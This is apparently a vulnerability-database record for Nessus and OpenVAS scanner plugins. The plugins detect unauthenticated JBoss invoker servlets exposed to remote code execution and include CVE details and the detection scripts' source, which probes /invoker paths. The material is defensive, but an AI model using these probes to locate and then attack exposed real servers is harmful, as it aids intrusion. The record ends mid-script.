The 'EJBInvokerServlet' and 'JMXInvokerServlet' servlets hosted on the web server on the remote host are accessible to unauthenticated users. The remote host is, therefore, affected by the following vulnerabilities:
- A security bypass vulnerability exists due to improper restriction of access to the console and web management interfaces. An unauthenticated, remote attacker can exploit this, via direct requests, to bypass authentication and gain administrative access.
(CVE-2007-1036)
- A remote code execution vulnerability exists due to the JMXInvokerHAServlet and EJBInvokerHAServlet invoker servlets not properly restricting access to profiles. An unauthenticated, remote attacker can exploit this to bypass authentication and invoke MBean methods, resulting in the execution of arbitrary code.
(CVE-2012-0874)
- A remote code execution vulnerability exists in the EJBInvokerServlet and JMXInvokerServlet servlets due to the ability to post a marshalled object. An unauthenticated, remote attacker can exploit this, via a specially crafted request, to install arbitrary applications. Note that this issue is known to affect McAfee Web Reporter versions prior to or equal to version 5.2.1 as well as Symantec Workspace Streaming version 7.5.0.493 and possibly earlier.
(CVE-2013-4810)
{"id": "JMXINVOKERSERVLET_EJBINVOKERSERVLET_RCE.NASL", "vendorId": null, "type": "nessus", "bulletinFamily": "scanner", "title": "Apache Tomcat / JBoss EJBInvokerServlet / JMXInvokerServlet Multiple Vulnerabilities", "description": "The 'EBJInvokerServlet' and 'JMXInvokerServlet' servlets hosted on the web server on the remote host are accessible to unauthenticated users. The remote host is, therefore, affected by the following vulnerabilities :\n\n - A security bypass vulnerability exists due to improper restriction of access to the console and web management interfaces. An unauthenticated, remote attacker can exploit this, via direct requests, to bypass authentication and gain administrative access.\n (CVE-2007-1036)\n\n - A remote code execution vulnerability exists due to the JMXInvokerHAServlet and EJBInvokerHAServlet invoker servlets not properly restricting access to profiles. An unauthenticated, remote attacker can exploit this to bypass authentication and invoke MBean methods, resulting in the execution of arbitrary code.\n (CVE-2012-0874)\n\n - A remote code execution vulnerability exists in the EJBInvokerServlet and JMXInvokerServlet servlets due to the ability to post a marshalled object. An unauthenticated, remote attacker can exploit this, via a specially crafted request, to install arbitrary applications. Note that this issue is known to affect McAfee Web Reporter versions prior to or equal to version 5.2.1 as well as Symantec Workspace Streaming version 7.5.0.493 and possibly earlier.\n (CVE-2013-4810)", "published": "2013-10-14T00:00:00", "modified": "2022-03-28T00:00:00", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cvss2": {}, "cvss3": {"score": null, "vector": null}, "href": "https://www.tenable.com/plugins/nessus/70414", "reporter": "This script is Copyright (C) 2013-2022 and is owned by Tenable, Inc. 
or an Affiliate thereof.", "references": ["http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4810", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0874", "http://www.nessus.org/u?52567bc1", "https://seclists.org/bugtraq/2013/Oct/126", "http://www.nessus.org/u?74979c27", "https://www.securityfocus.com/archive/1/530241/30/0/threaded", "https://seclists.org/bugtraq/2013/Dec/att-133/ESA-2013-094.txt", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1036", "https://www.zerodayinitiative.com/advisories/ZDI-13-229/"], "cvelist": ["CVE-2007-1036", "CVE-2012-0874", "CVE-2013-4810"], "immutableFields": [], "lastseen": "2022-06-16T14:16:23", "viewCount": 3351, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:042526B3-4F4D-49D3-A3D1-B483FB66CF4C"]}, {"type": "cert", "idList": ["VU:632656"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2019-0078"]}, {"type": "cve", "idList": ["CVE-2007-1036", "CVE-2012-0874", "CVE-2013-4810"]}, {"type": "fireeye", "idList": ["FIREEYE:3CF3A3DF17A5FD20D5E05C24F6DBC54B"]}, {"type": "nessus", "idList": ["CISCO_PRIME_DCNM_6_1_2.NASL", "CISCO_PRIME_DCNM_6_1_2_LOCAL.NASL", "JBOSS_JAVA_SERIALIZE.NASL", "REDHAT-RHSA-2013-0191.NASL", "REDHAT-RHSA-2013-0192.NASL", "REDHAT-RHSA-2013-0193.NASL", "REDHAT-RHSA-2013-0195.NASL", "REDHAT-RHSA-2013-0196.NASL", "REDHAT-RHSA-2013-0197.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310103811", "OPENVAS:1361412562310142595"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:116241"]}, {"type": "redhat", "idList": ["RHSA-2013:0191", "RHSA-2013:0192", "RHSA-2013:0194", "RHSA-2013:0195", "RHSA-2013:0196", "RHSA-2013:0198", "RHSA-2013:0221", "RHSA-2013:0533"]}, {"type": "saint", "idList": ["SAINT:73B78E4CC6A84900DDFE755805A5092F", "SAINT:88A58EBA93902ACCCFD4D15339D739F8", "SAINT:C4CE6EE786263B63DE8534C3A7C9A1ED", "SAINT:F331FA17751309C5BD461AF4E8A90312"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:29808", 
"SECURITYVULNS:DOC:30174", "SECURITYVULNS:DOC:30182", "SECURITYVULNS:VULN:13282", "SECURITYVULNS:VULN:13495", "SECURITYVULNS:VULN:13501", "SECURITYVULNS:VULN:7280"]}, {"type": "seebug", "idList": ["SSV:60624"]}, {"type": "thn", "idList": ["THN:8573602ED2B18F90AC04D8BA8D25E682"]}, {"type": "threatpost", "idList": ["THREATPOST:260D48C8E6CF572D5CE165F85C7265E6", "THREATPOST:7E20261F9330304969941B4755E98BAA"]}, {"type": "zdi", "idList": ["ZDI-13-229"]}]}, "score": {"value": 0.5, "vector": "NONE"}, "backreferences": {"references": [{"type": "cert", "idList": ["VU:632656"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2019-0078"]}, {"type": "cve", "idList": ["CVE-2007-1036"]}, {"type": "fireeye", "idList": ["FIREEYE:3CF3A3DF17A5FD20D5E05C24F6DBC54B"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/MULTI/HTTP/JBOSS_INVOKE_DEPLOY"]}, {"type": "nessus", "idList": ["JBOSS_JAVA_SERIALIZE.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310142595"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:116241"]}, {"type": "redhat", "idList": ["RHSA-2013:0196"]}, {"type": "saint", "idList": ["SAINT:88A58EBA93902ACCCFD4D15339D739F8"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:13495"]}, {"type": "seebug", "idList": ["SSV:60624"]}, {"type": "threatpost", "idList": ["THREATPOST:7E20261F9330304969941B4755E98BAA"]}, {"type": "zdi", "idList": ["ZDI-13-229"]}]}, "exploitation": null, "vulnersScore": 0.5}, "_state": {"dependencies": 1659965596, "score": 1659817288}, "_internal": {"score_hash": "3fe0e744e30d49b7ecf93c2205d269de"}, "pluginID": "70414", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(70414);\n script_version(\"1.24\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/03/28\");\n\n script_cve_id(\"CVE-2007-1036\", \"CVE-2012-0874\", \"CVE-2013-4810\");\n script_bugtraq_id(57552, 62854, 
77037);\n script_xref(name:\"CERT\", value:\"632656\");\n script_xref(name:\"EDB-ID\", value:\"16318\");\n script_xref(name:\"EDB-ID\", value:\"21080\");\n script_xref(name:\"EDB-ID\", value:\"28713\");\n script_xref(name:\"EDB-ID\", value:\"30211\");\n script_xref(name:\"ZDI\", value:\"ZDI-13-229\");\n script_xref(name:\"HP\", value:\"HPSBGN02952\");\n script_xref(name:\"HP\", value:\"SSRT101127\");\n script_xref(name:\"HP\", value:\"emr_na-c04041110\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/04/15\");\n\n script_name(english:\"Apache Tomcat / JBoss EJBInvokerServlet / JMXInvokerServlet Multiple Vulnerabilities\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The 'EBJInvokerServlet' and 'JMXInvokerServlet' servlets hosted on\nthe web server on the remote host are accessible to unauthenticated\nusers. The remote host is, therefore, affected by the following\nvulnerabilities :\n\n - A security bypass vulnerability exists due to improper\n restriction of access to the console and web management\n interfaces. An unauthenticated, remote attacker can\n exploit this, via direct requests, to bypass\n authentication and gain administrative access.\n (CVE-2007-1036)\n\n - A remote code execution vulnerability exists due to the\n JMXInvokerHAServlet and EJBInvokerHAServlet invoker\n servlets not properly restricting access to profiles. An\n unauthenticated, remote attacker can exploit this to\n bypass authentication and invoke MBean methods,\n resulting in the execution of arbitrary code.\n (CVE-2012-0874)\n\n - A remote code execution vulnerability exists in the\n EJBInvokerServlet and JMXInvokerServlet servlets due to\n the ability to post a marshalled object. An\n unauthenticated, remote attacker can exploit this, via a\n specially crafted request, to install arbitrary\n applications. 
Note that this issue is known to affect\n McAfee Web Reporter versions prior to or equal to\n version 5.2.1 as well as Symantec Workspace Streaming\n version 7.5.0.493 and possibly earlier.\n (CVE-2013-4810)\");\n # https://www.redteam-pentesting.de/publications/2009-11-30-Whitepaper_Whos-the-JBoss-now_RedTeam-Pentesting_EN.pdf\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?74979c27\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.zerodayinitiative.com/advisories/ZDI-13-229/\");\n # https://web.archive.org/web/20131031213751/http://retrogod.altervista.org/9sg_ejb.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?52567bc1\");\n script_set_attribute(attribute:\"see_also\", value:\"https://seclists.org/bugtraq/2013/Oct/126\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.securityfocus.com/archive/1/530241/30/0/threaded\");\n script_set_attribute(attribute:\"see_also\", value:\"https://seclists.org/bugtraq/2013/Dec/att-133/ESA-2013-094.txt\");\n script_set_attribute(attribute:\"solution\", value:\n\"If using EMC Data Protection Advisor, either upgrade to version 6.x or\napply the workaround for 5.x. 
\n\nOtherwise, contact the vendor or remove any affected JBoss servlets.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:U/RC:ND\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2013-4810\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_nessus\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'JBoss JMX Console Deployer Upload and Execute');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_exploithub\", value:\"true\");\n script_set_attribute(attribute:\"exploithub_sku\", value:\"EH-13-606\");\n script_cwe_id(264);\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/09/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/10/14\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:hp:procurve_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:hp:application_lifecycle_management\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:hp:identity_driven_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:redhat:jboss_enterprise_web_platform\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:redhat:jboss_enterprise_application_platform\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:redhat:jboss_enterprise_brms_platform\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:redhat:jboss_enterprise_application_platform\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:jboss:jboss_application_server\");\n 
script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:symantec:workspace_streaming\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2013-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"http_version.nasl\");\n script_require_ports(\"Services/www\", 9111, 8080, 9832);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\n\n# Identify possible ports.\n#\n# - web servers.\nports = get_kb_list(\"Services/www\");\nif (isnull(ports)) ports = make_list();\n\n# - ports for McAfee Web Reporter and Symantec Workspace Streaming.\nforeach p (make_list(8080, 9111, 9832))\n{\n if (service_is_unknown(port:p)) ports = add_port_in_list(list:ports, port:p);\n}\n\n# Check each port.\nnon_vuln = make_list();\n\nforeach port (ports)\n{\n vuln_urls = make_list();\n\n foreach page (make_list(\"/EJBInvokerServlet\", \"/JMXInvokerServlet\"))\n {\n url = \"/invoker\" + page;\n res = http_send_recv3(\n method : \"GET\",\n item : url,\n port : port,\n fetch404 : TRUE\n );\n\n if (\n !isnull(res) &&\n \"org.jboss.invocation.MarshalledValue\" >< res[2] &&\n (\n 'WWW-Authenticate: Basic realm=\"JBoss HTTP Invoker\"' >!< res[1] ||\n \"404 Not Found\" >!< res[1]\n )\n ) vuln_urls = make_list(vuln_urls, build_url(qs:url, port:port));\n }\n\n if (max_index(vuln_urls) > 0)\n {\n if (max_index(vuln_urls) > 1) request = \"URLs\";\n else request = \"URL\";\n\n if (report_verbosity > 0)\n {\n report =\n '\\n' +'Nessus was able to verify the issue exists using the following '+\n '\\n' + request + ' :' +\n '\\n' +\n '\\n' + join(vuln_urls, sep:'\\n') + '\\n';\n\n security_hole(port:port, extra:report);\n }\n else security_hole(port);\n }\n else non_vuln = make_list(non_vuln, port);\n}\n\nif (max_index(non_vuln) == 1) exit(0, \"The web server tested on port \" + port + 
\" is not affected.\");\nelse if (max_index(non_vuln) > 1) exit(0, \"None of the ports tested (\" +join(non_vuln, sep:\", \")+ \") contain web servers that are affected.\");\n", "naslFamily": "CGI abuses", "cpe": ["cpe:/a:hp:procurve_manager", "cpe:/a:hp:application_lifecycle_management", "cpe:/a:hp:identity_driven_manager", "cpe:/a:redhat:jboss_enterprise_web_platform", "cpe:/a:redhat:jboss_enterprise_application_platform", "cpe:/a:redhat:jboss_enterprise_brms_platform", "cpe:/a:redhat:jboss_enterprise_application_platform", "cpe:/a:jboss:jboss_application_server", "cpe:/a:symantec:workspace_streaming"], "solution": "If using EMC Data Protection Advisor, either upgrade to version 6.x or apply the workaround for 5.x. \n\nOtherwise, contact the vendor or remove any affected JBoss servlets.", "nessusSeverity": "Critical", "cvssScoreSource": "CVE-2013-4810", "vpr": {"risk factor": "High", "score": "7.4"}, "exploitAvailable": true, "exploitEase": "Exploits are available", "patchPublicationDate": null, "vulnerabilityPublicationDate": "2013-09-09T00:00:00", "exploitableWith": ["Core Impact", "Metasploit(JBoss JMX Console Deployer Upload and Execute)", "ExploitHub(EH-13-606)"]}
{"attackerkb": [{"lastseen": "2022-06-29T04:59:45", "description": "HP ProCurve Manager (PCM) 3.20 and 4.0, PCM+ 3.20 and 4.0, Identity Driven Manager (IDM) 4.0, and Application Lifecycle Management allow remote attackers to execute arbitrary code via a marshalled object to (1) EJBInvokerServlet or (2) JMXInvokerServlet, aka ZDI-CAN-1760. NOTE: this is probably a duplicate of CVE-2007-1036, CVE-2010-0738, and/or CVE-2012-0874.\n\n \n**Recent assessments:** \n \nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "cvss3": {}, "published": "2013-09-16T00:00:00", "type": "attackerkb", "title": "CVE-2013-4810", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2007-1036", "CVE-2010-0738", "CVE-2012-0874", "CVE-2013-4810"], "modified": "2020-06-05T00:00:00", "id": "AKB:042526B3-4F4D-49D3-A3D1-B483FB66CF4C", "href": "https://attackerkb.com/topics/ku1plIvfwG/cve-2013-4810", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "cve": [{"lastseen": "2022-03-23T13:53:22", "description": "HP ProCurve Manager (PCM) 3.20 and 4.0, PCM+ 3.20 and 4.0, Identity Driven Manager (IDM) 4.0, and Application Lifecycle Management allow remote attackers to execute arbitrary code via a marshalled object to (1) EJBInvokerServlet or (2) JMXInvokerServlet, aka ZDI-CAN-1760. 
NOTE: this is probably a duplicate of CVE-2007-1036, CVE-2010-0738, and/or CVE-2012-0874.", "cvss3": {}, "published": "2013-09-16T13:01:00", "type": "cve", "title": "CVE-2013-4810", "cwe": ["CWE-94"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2007-1036", "CVE-2010-0738", "CVE-2012-0874", "CVE-2013-4810"], "modified": "2017-10-05T01:29:00", "cpe": ["cpe:/a:hp:application_lifecycle_management:-", "cpe:/a:hp:identity_driven_manager:4.0", "cpe:/a:hp:procurve_manager:4.0", "cpe:/a:hp:procurve_manager:3.20"], "id": "CVE-2013-4810", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-4810", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:hp:procurve_manager:3.20:*:*:*:*:plus:*:*", "cpe:2.3:a:hp:procurve_manager:4.0:*:*:*:*:plus:*:*", "cpe:2.3:a:hp:identity_driven_manager:4.0:*:*:*:*:*:*:*", "cpe:2.3:a:hp:application_lifecycle_management:-:*:*:*:*:*:*:*", "cpe:2.3:a:hp:procurve_manager:4.0:*:*:*:*:*:*:*", "cpe:2.3:a:hp:procurve_manager:3.20:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T11:49:48", "description": "The (1) JMXInvokerHAServlet and (2) EJBInvokerHAServlet invoker servlets in JBoss Enterprise Application Platform (EAP) before 5.2.0, Web Platform (EWP) before 5.2.0, BRMS Platform before 5.3.1, and SOA Platform before 5.3.1 do not require authentication by default in certain profiles, which might allow remote attackers to invoke MBean methods and execute arbitrary code via unspecified vectors. 
NOTE: this issue can only be exploited when the interceptor is not properly configured with a \"second layer of authentication,\" or when used in conjunction with other vulnerabilities that bypass this second layer.", "cvss3": {}, "published": "2013-02-05T23:55:00", "type": "cve", "title": "CVE-2012-0874", "cwe": ["CWE-287"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-0874"], "modified": "2017-08-29T01:31:00", "cpe": ["cpe:/a:redhat:jboss_enterprise_application_platform:5.2.0", "cpe:/a:redhat:jboss_enterprise_brms_platform:5.3.0", "cpe:/a:redhat:jboss_enterprise_web_platform:5.2.0"], "id": "CVE-2012-0874", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-0874", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:redhat:jboss_enterprise_web_platform:5.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:redhat:jboss_enterprise_application_platform:5.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:redhat:jboss_enterprise_brms_platform:5.3.0:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T11:48:01", "description": "The default configuration of JBoss does not restrict access to the (1) console and (2) web management interfaces, which allows remote attackers to bypass authentication and gain administrative access via direct requests.", "cvss3": {}, "published": "2007-02-21T11:28:00", "type": "cve", "title": "CVE-2007-1036", "cwe": ["CWE-264"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, 
"obtainOtherPrivilege": true, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2007-1036"], "modified": "2018-10-16T16:36:00", "cpe": ["cpe:/a:jboss:jboss_application_server:*"], "id": "CVE-2007-1036", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2007-1036", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:jboss:jboss_application_server:*:*:*:*:*:*:*:*"]}], "openvas": [{"lastseen": "2020-05-08T11:04:12", "description": "Apache Tomcat/JBoss Application Server is prone to multiple remote code-\n execution vulnerabilities.", "cvss3": {}, "published": "2013-10-15T00:00:00", "type": "openvas", "title": "Apache Tomcat/JBoss EJBInvokerServlet / JMXInvokerServlet (RMI over HTTP) Marshalled Object Remote Code Execution", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2013-4810", "CVE-2012-0874"], "modified": "2020-05-05T00:00:00", "id": "OPENVAS:1361412562310103811", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310103811", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Apache Tomcat/JBoss EJBInvokerServlet / JMXInvokerServlet (RMI over HTTP) Marshalled Object Remote Code Execution\n#\n# Authors:\n# Michael Meyer <michael.meyer@greenbone.net>\n#\n# Copyright:\n# Copyright (C) 2013 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# 
but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.103811\");\n script_bugtraq_id(57552, 62854);\n script_version(\"2020-05-05T09:44:01+0000\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_cve_id(\"CVE-2012-0874\", \"CVE-2013-4810\");\n script_name(\"Apache Tomcat/JBoss EJBInvokerServlet / JMXInvokerServlet (RMI over HTTP) Marshalled Object Remote Code Execution\");\n script_tag(name:\"last_modification\", value:\"2020-05-05 09:44:01 +0000 (Tue, 05 May 2020)\");\n script_tag(name:\"creation_date\", value:\"2013-10-15 10:27:36 +0200 (Tue, 15 Oct 2013)\");\n script_category(ACT_GATHER_INFO);\n script_family(\"Web application abuses\");\n script_copyright(\"Copyright (C) 2013 Greenbone Networks GmbH\");\n script_dependencies(\"find_service.nasl\", \"httpver.nasl\", \"global_settings.nasl\");\n script_require_ports(\"Services/www\", 80);\n script_exclude_keys(\"Settings/disable_cgi_scanning\");\n\n script_xref(name:\"URL\", value:\"https://www.zerodayinitiative.com/advisories/ZDI-13-229/\");\n script_xref(name:\"URL\", value:\"http://www.securityfocus.com/bid/57552\");\n script_xref(name:\"URL\", value:\"http://www.securityfocus.com/bid/62854\");\n script_xref(name:\"URL\", value:\"https://www.exploit-db.com/exploits/28713/\");\n script_xref(name:\"URL\", value:\"https://www.exploit-db.com/exploits/30211\");\n\n script_tag(name:\"impact\", value:\"Successfully exploiting these issues may allow an attacker to 
execute\n arbitrary code within the context of the affected application. Failed\n exploit attempts may result in a denial-of-service condition.\");\n\n script_tag(name:\"vuldetect\", value:\"Determine if the EJBInvokerServlet and/or JMXInvokerServlet is accessible without authentication.\");\n\n script_tag(name:\"insight\", value:\"The specific flaw exists within the exposed EJBInvokerServlet and JMXInvokerServlet. An unauthenticated\n attacker can post a marshalled object allowing them to install an arbitrary application on the target server.\");\n\n script_tag(name:\"solution\", value:\"Ask the Vendor for an update and enable authentication for the mentioned servlets.\");\n\n script_tag(name:\"summary\", value:\"Apache Tomcat/JBoss Application Server is prone to multiple remote code-\n execution vulnerabilities.\");\n\n script_tag(name:\"affected\", value:\"Apache Tomcat/JBoss Application Server providing access to the EJBInvokerServlet and/or JMXInvokerServlet\n without prior authentication.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"remote_analysis\");\n\n exit(0);\n}\n\ninclude(\"http_func.inc\");\n\nport = http_get_port(default:9200);\n\nreport = 'The following Servlets are accessible without authentication which indicates that a RCE attack can be executed:\\n';\n\nforeach file(make_list(\"/EJBInvokerServlet\", \"/JMXInvokerServlet\")) {\n\n url = \"/invoker\" + file;\n req = http_get(item:url, port:port);\n buf = http_send_recv(port:port, data:req);\n\n if(buf =~ \"^HTTP/1\\.[01] 200\" &&\n \"404\" >!< buf &&\n \"org.jboss.invocation.MarshalledValue\" >< buf &&\n \"x-java-serialized-object\" >< buf &&\n \"WWW-Authenticate\" >!< buf) {\n\n report += '\\n' + http_report_vuln_url(port:port, url:url, url_only:TRUE);\n VULN = TRUE;\n }\n}\n\nif(VULN) {\n security_message(port:port, data:report);\n exit(0);\n}\n\nexit(99);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, 
{"lastseen": "2020-05-12T16:22:26", "description": "The default configuration of JBoss does not restrict access to the console and\n web management interfaces, which allows remote attackers to bypass authentication and gain administrative access\n via direct requests.", "cvss3": {}, "published": "2019-07-12T00:00:00", "type": "openvas", "title": "JBoss Console and Web Management Misconfiguration Vulnerability", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2007-1036"], "modified": "2020-05-08T00:00:00", "id": "OPENVAS:1361412562310142595", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310142595", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n# Some text descriptions might be excerpted from (a) referenced\n# source(s), and are Copyright (C) by the respective right holder(s).\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nCPE = 'cpe:/a:redhat:jboss_application_server';\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.142595\");\n script_version(\"2020-05-08T08:34:44+0000\");\n script_tag(name:\"last_modification\", value:\"2020-05-08 08:34:44 +0000 (Fri, 08 May 2020)\");\n script_tag(name:\"creation_date\", value:\"2019-07-12 06:01:03 +0000 (Fri, 12 Jul 2019)\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n\n script_cve_id(\"CVE-2007-1036\");\n\n script_tag(name:\"qod_type\", value:\"remote_vul\");\n\n script_tag(name:\"solution_type\", value:\"Mitigation\");\n\n script_name(\"JBoss Console and Web Management Misconfiguration Vulnerability\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"JBoss_enterprise_aplication_server_detect.nasl\");\n script_mandatory_keys(\"jboss/detected\");\n\n script_tag(name:\"summary\", value:\"The default configuration of JBoss does not restrict access to the console and\n web management interfaces, which allows remote attackers to bypass authentication and gain administrative access\n via direct requests.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if the jmx-console or web-console is accessible without authentication.\");\n\n script_tag(name:\"solution\", value:\"As stated by Red Hat, the JBoss AS console manager should always be secured\n prior to deployment, as directed in the JBoss Application Server Guide and release notes. By default, the JBoss\n AS installer gives users the ability to password protect the console manager. 
